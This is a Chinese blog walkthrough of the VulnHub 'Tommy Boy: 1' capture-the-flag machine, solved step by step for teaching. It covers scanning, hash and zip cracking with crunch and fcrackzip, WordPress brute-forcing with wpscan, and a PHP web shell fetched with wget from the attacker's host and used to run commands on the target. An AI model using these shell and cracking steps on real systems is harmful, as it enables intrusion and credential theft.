**

VulnHub-Tommy Boy: 1-Walkthrough

**

靶机地址:https://www.vulnhub.com/entry/tommy-boy-1,157/
靶机难度:中级(CTF)
靶机发布日期:2016年7月27日
靶机描述:
圣施耐克!汤米男孩需要您的帮助!
卡拉汉汽车公司终于进入了现代技术领域,并建立了一个Web服务器供其客户订购刹车片。
不幸的是,该站点刚刚瘫痪,唯一拥有管理员凭据的人是Tom Callahan Sr.-他刚刚去世!更糟糕的是,唯一一个了解服务器的人退出了!
您需要帮助Tom Jr.,Richard和Michelle再次恢复该网页。否则,卡拉汉汽车公司肯定会倒闭:-( ----谷歌翻译
目标:找到六个flag
作者:大余
时间:2020-02-01
请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集


我们在VM中需要确定攻击目标的IP地址,需要使用nmap获取目标IP地址:

我们已经找到了此次CTF目标计算机IP地址:192.168.182.140

nmap扫到22、80、8008端口是开启的…

web看到的是Callahan Auto!的页面…

直接访问robots.txt发现了第一个标志…

Flag1 data: B34rcl4ws…

发现个jpg文件…查看下


都没发现有用的信息…回到80端口web页面,在前段源码发现了个视频网页,看看…


3秒的视频,给了我们提示…prehistoricforest…

这是博客…在这里找到了flag2…


thisisthesecondflagyayyou.txt…上面还是个wordpress CMD架构的博客,可以用wpscan直接扫出的…

Flag data: Z4l1nsky,轻松找到…

在2016年7月7号里的内容还发现了/richard目录…



发现哈希值,破解看看…ce154b5a8e59c89732bc25d6a2e6b90b

密码是spanky

浏览到这里需要密码…映衬了前面MD5值的密码…试试

里面这篇文章讲解了:
1.可以使用Big Tom的主目录中的备份文件Callahanbak.bak恢复Callahan Auto的网站…
2.只需要在Big Tom的帐户下完成第一,但是Big Tom总是忘记他的密码,正如我们以前在Big Tom中看到的那样,将他的SSH证书的第二部分保存在草稿博客中…
3.Nick的FTP下还有其他信息,但FTP服务器并不总是在线(上15分钟,下15分钟然后循环)…
4.Nick只是使用容易猜到的密码重设了FTP帐户名“nickburns”,并且已经删除了SSH帐户…
这边提到了FTP,尝试登录试试…


nmap扫了FTP开放的端口是65534…链接进去后用户名密码都是nickburns…发现下面有readme.txt文件…查看到信息:
1.服务器上有一个名为NickIzL33t的子文件夹,Nick个人使用的…
2. Nick创建了一个加密的zip文件来存储Big的Tom凭据…
3. Nick创建了一个提示,提示输入密码以提取加密的zip文件…

果然,8008上是nick的服务器…

Steve Jobs可以查看内容…这边直接设置代理…

不会的在这里安装…搜索:Firefox user agent pl

设置Iphon3代理后,重新访问…(因为前面提到只能Steve Jobs访问)

这边意思存在隐藏html,这边有两种方式可以找到,wfuzz和dirbuster,继续…
这边使用dirbuster进行…

选择Iphone为User Agent代理即可…

填入爆破地址,单词表,目录,模式html即可…大概爆破了几分钟…

存在隐藏html:http://192.168.182.140:8008/NickIzL33t/fallon1.html,访问…

上面有三个提示,我一个一个试试寻找信息吧…

从第一个提示中提取Big Tom的加密密码备份文件…

flag3:TinyHead
第三个flag…将flag下载到本地,和第三个提示下载了个.zip到本地…

根据第一个提示去爆破第三个文件…

信息:bev[A-Z][0-9][0-9][a-z][a-z][symbol]1955
我使用crunch给定模式生成字典列表…crunch学习链接

命令:crunch 13 13 -t bev,%%@@^1995 -o passlist_tomboy.txt
5800万个组合,10秒就完成了…牛逼的工具…
然后使用fcrackzip与生成的字典文件一起使用破解加密zip文件即可…

命令:fcrackzip -v -D -u -p dayu1.txt t0msp4ssw0rdz.zip (花了2分多钟把)
密码:bevH00tr$1995 解压…

解压有pass文本…进去发现了三个用户名和密码…提示了个重要信息:fatguyinalittlecoat
说在这之后还有一些数字…在去找找下博客有啥内容…

前面就知道这是个wordpress博客,这边用wpscan扫描下它的用户名…

命令:wpscan -u http://192.168.182.140/prehistoricforest/ --enumerate u

命令:wpscan -u http://192.168.182.140/prehistoricforest --wordlist /usr/share/wordlists/rockyou.txt --username tom --threads 50
密码:tomtom1


果然,在草稿箱里面发现了一封邮件,对称了前面的解释…(花了1个小时)
用户:bigtommysenior 密码:fatguyinalittlecoat1938!!


flag4:EditButton
拿到了flag4…还发现LOOT.ZIP受保护的zip文件以及网站的备份文件…
目前主要是恢复Callahan Auto的网站…

命令:cp callahanbak.bak /var/www/html/index.html

Callahan Auto网站回到在线…访问…

完成后我得提权…

www-data是.5.txt的所有者…需要在web上提个shell即可读取…
由于该Web服务器的后端是Apache…
找到了上传文件的目录…也是在.zip目录边上…

http://192.168.182.140:8008/NickIzL33t//P4TCH_4D4MS/

简单设置一个shell即可阅读…

<?php system($_GET['cmd']); ?>


命令:wget http://192.168.182.149:5555/dayushell.php -O sh.php
上传后在web执行cmd命令即可…

当然上传以上类型的shellcode也可以获得权限…
前往web访问:http://192.168.182.140:8008/NickIzL33t//P4TCH_4D4MS/uploads/sh.php?cmd=cat%20/.5.txt

flag5:Buttcrack
说到将flag1~5全部合并就能提取loot.zip…

前面已经知道在bigtommysenior用户下还存在一个LOOT.ZIP未解开…
flag1:B34rcl4ws
flag2:Z4l1nsky
flag3:TinyHead
flag4:EditButton
flag5:Buttcrack
密码: B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack

全部找到…

这篇只有一个标题,信息收集…因为全在作者邮箱到博客里引导着走,全文离不开信息收集…
这里卡住的地方是需要用iphone代理来访问…加油!

由于我们已经成功找到六个flag,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

No.38-VulnHub-Tommy Boy: 1-Walkthrough渗透学习相关推荐

  1. 2021年1月4日-Vulnhub-DerpNStink渗透学习

    2021年1月4日-Vulnhub-DerpNStink渗透学习 靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ kali地址:192.168 ...

  2. VulnHub-The Ether: EvilScience (v1.0.1)渗透学习

    VulnHub-The Ether: EvilScience (v1.0.1)渗透学习 前言 靶机地址:https://download.vulnhub.com/lazysysadmin/Lazysy ...

  3. 内网渗透学习-Windows信息收集

    内网渗透学习-Windows信息收集 本章内容主要介绍在获取网站服务器webshell后,怎样对Windows主机进行信息收集,对其网络环境进行分析和利用,主要是一个思路整理,在后续的章节中会整理更详 ...

  4. 文件上传漏洞---Web渗透学习

    文件上传本身是一个系统的正常需求,但是由于开发人员在开发时欠缺相关的安全知识,在对用户文件上传部分的控制不足或者缺陷,而导致用户越过其本身权限向服务器上传可执行的动态脚本文件. 这里上传的文件可以是木 ...

  5. 渗透学习-SQL注入篇-基础知识的学习(持续更新中)

    提示:仅供进行学习使用,请勿做出非法的行为.如若由任何违法行为,将依据法律法规进行严惩!!! 文章目录 前言 一.SQL注入产生的原因 二.手工注入大致过程 1.判断注入点: 2.猜解列名 3.猜解能 ...

  6. K8S云原生环境渗透学习

    转载至​​​​​​K8S云原生环境渗透学习 - 先知社区 K8S云原生环境渗透学习 前言 ​ Kubernetes,简称k8s,是当前主流的容器调度平台,被称为云原生时代的操作系统.在实际项目也经常发 ...

  7. 图片木马---web渗透学习

    在<文件上传漏洞-Web渗透学习>一文中讲到在高安全级别(有较强安全意识的开发人员)中,开放人员定义了用户上传文件的扩展名,只有文件扩展名是jpg.JPG.jpeg.JPEG等文件才允许上 ...

  8. KEIL 5.38的ARM-CM3/4 ARM汇编设计学习笔记3——串口Stdio实现

    KEIL 5.38的ARM-CM3/4 ARM汇编设计学习笔记3--串口Stdio实现 一.介绍 任务目标 二.工程创建 三.软件设计 第一步,BSP构建 1, 添加前面的pll_config文件 2 ...

  9. Web安全渗透学习-环境搭建

    Web安全渗透-学习笔记-第一阶段 环境准备 OWASP靶机下载 OWASP下载教程 Kali虚拟机安装 虚拟机网络环境设置 虚拟机无法上网的情况 小得 环境准备 首先我只是一名纯小白,特别纯那种,目 ...

  10. web渗透学习路线图

    前言 首先,你要高度热爱网络安全这个领域,你要问问自己是否是真的热爱这个行业,自己是否会因为各种了理由半途而废,放弃掉你的热爱.衡量热爱的方法特别特别地简单:看看自己主动花了多少时间在哪些事情方面,重 ...

最新文章

  1. 简洁好用的项目管理工具推荐~马起来
  2. R语言基于线性回归(Linear Regression)进行特征筛选(feature selection)
  3. jad 反编译java
  4. android jack log,Android:JACK编译错误汇总及解决
  5. SQL Server LOWER Functions
  6. WPF#39;s Style BasedOn
  7. 数据库事务的隔离级别简单总结
  8. .NET Core快速入门教程 3、我的第一个.NET Core App (CentOS篇)
  9. 孩子从全班倒数第一到第二名,这位妈妈只做了这1件事!
  10. 在Nutz中如何配置多个数据库源,并且带事务控制
  11. 分布式工作笔记001---分布式系统中CAP 定理的含义
  12. python杨辉三角函数_Python算法之六:杨辉三角
  13. sql 新建表 alter_SQL ALTER表
  14. 541.反转字符串||
  15. 小游戏学习--获取已发布微信小游戏源码
  16. 完全小白向win10安装配置Java运行环境
  17. 关于ESAPI无法打印debug级别日志
  18. python matpltlib实践——画直方图、折线图
  19. 力扣刷题 DAY_66 回溯
  20. Unity 3D做2D坦克大战,控制图片切换朝向的2种方法。

热门文章

  1. ubuntu16.04下解决wps无法使用五笔输入中文的问题
  2. tar gz bz xz 解压缩命令
  3. linux操作系统:x86架构,一个良好的运营环境
  4. linux系统下安装pip3,linux下安装python3和对应的pip环境教程详解
  5. Jzoj4210 我才不是萝莉控呢
  6. 赛门铁克:与神州云科合作达成两大目标
  7. 赛门铁克:网络间谍组织Buckeye将攻击目标转至中国香港
  8. 【Python专题】函数式编程
  9. 2018最新精选的Go框架,库和软件的精选列表 二 https://awesome-go.com/
  10. 逃离贼船?新方舟需要我们去创造。